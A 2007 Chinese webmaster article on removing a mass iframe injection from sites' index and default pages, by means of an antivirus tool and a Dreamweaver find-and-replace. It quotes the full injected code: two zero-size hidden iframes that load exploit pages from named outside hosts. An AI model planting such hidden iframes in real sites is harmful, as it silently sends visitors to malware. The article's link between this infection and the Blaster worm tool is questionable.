站内公告
寂寞驿站 | 站内动态 | 文学知识 | 驿站图库 | 资源下载 | 影音在线 | 我要留言 | 周公解梦 | 寂寞论坛

:::会 员 登 陆:::  
 名  称  
 密  码  
 验证码   
  

:::超 级 搜 索:::  
栏  目  
类  别  
关键词  
 站内搜索   网络搜索
  

:::热门文章TOP10:::  
 独自寂寞
 毛泽东与《红楼梦》
 道歉情书
 第一次犯错
 爱是寂寞撕的谎
 老子道德经(白话文注解)
 羊脂球
 谈看书
 《红楼梦》十个为什么
 中国人的宗教

:::版权及免责声明:::  

  本站资料文章其版权归作者本人所有。
  如果有任何侵犯您版权的地方,请尽快与本站联系!

 来    源: 寂寞驿站
 作    者: 寂寞的狼
 发表日期: 2007-3-7 23:19:52
 阅读次数: 5514
 文章标题: 网站建设网站编程 → IFRAME木马,简单清除办法
 查看权限: 普通文章
 查看方式: 查看:[ 大字 中字 小字 ] [双击滚屏]
 正    文:
IFRAME木马,简单清除办法
服务器每个首页都被IFRAME WEB服务器被插入木马 简单清除办法

最近各公司的网站运行不稳定,我们把网站所有文件下下来,发现index.*和default.*文件的底部都植入了代码:

这就是网站瘫痪的罪魁祸首,打开网站的时候都会自动打开djloveqq.go3.icpcn.com/cert/joke.htm和hyap98.com/123/wawa.htm这两个网页,用江民拦截,报告有Exploit.vbs.phel.ba病毒。

   

此病毒是Exploit.vbs的亚种,植在某个网页里。客户端用户只要把IE的临时文件删除掉就可以了。服务器端要除此病毒(我在论坛上找了一种方法,不知道能不能彻底删除)方法如下:

先下载专杀工具杀毒,然后到微软的网站下载冲击波漏洞补?详细步骤参考瑞星网站:
http://it.rising.com.cn/service/technology/RS_blaster.htm

下载“冲击波(Worm.Blaster)”病毒专杀工具:
http://download.rising.com.cn/zsgj/ravblaster.exe

然后重起系统按F8键进入安全模式(安全模式下病毒未加载),运行ravblaster.exe可以完全杀除病毒且打上系统补丁!

要使服务器能稳定运行还需要大家共同努力,各学校网站管理员应尽量减少自己网站代码的漏洞,自己修改漏洞,也可以经常去自己网站官方论坛转转,及时下载补丁,交流技术。

要现清楚index.*和default.*文件里的恶意代码,如果采取一个一个的删除,那也太忙了,昨晚我发现一个很好的方法,方法绝对可靠,和大家分享。

首先,打开Dreamwaver MX,按CTRL+F键,弹出如下窗口:

 

其次,在查找范围栏选择文件夹,选择你网站在本机的文件夹,搜索栏选择源代码,查找栏键入<iframe src='http://www.hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'></iframe><iframe src='http://djloveqq.go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'></iframe>注意,一定要粘贴完整,替换栏留空,如下图

 

第三,点击右边的替换全部,会弹出窗口,选择是即可。如果你还是初次使用这功能,建议你先备份后再做操作。

 

第四,看看有多少文件被植入网页马吧,

 

简简单单就把100多个网页马清楚了,不信你试试。

采取这种方法,最大的好处就在于不会漏删误删,省时省力。如果大家还有更好的办法,拿出来共享一下吧!


上一篇:asp中单引号与双引号的用法
下一篇:在飞腾页面中加入嵌入式即时新闻
会员注册 | 版权声明 | 关于站长 | 超级搜索 | 友情链接 
Copyright© 2005-2010 寂寞驿站, All rights reserved。
站长:寂寞的狼 建站时间:2004-10-13 站长信箱:www@jmdl.net
粤ICP备16051526号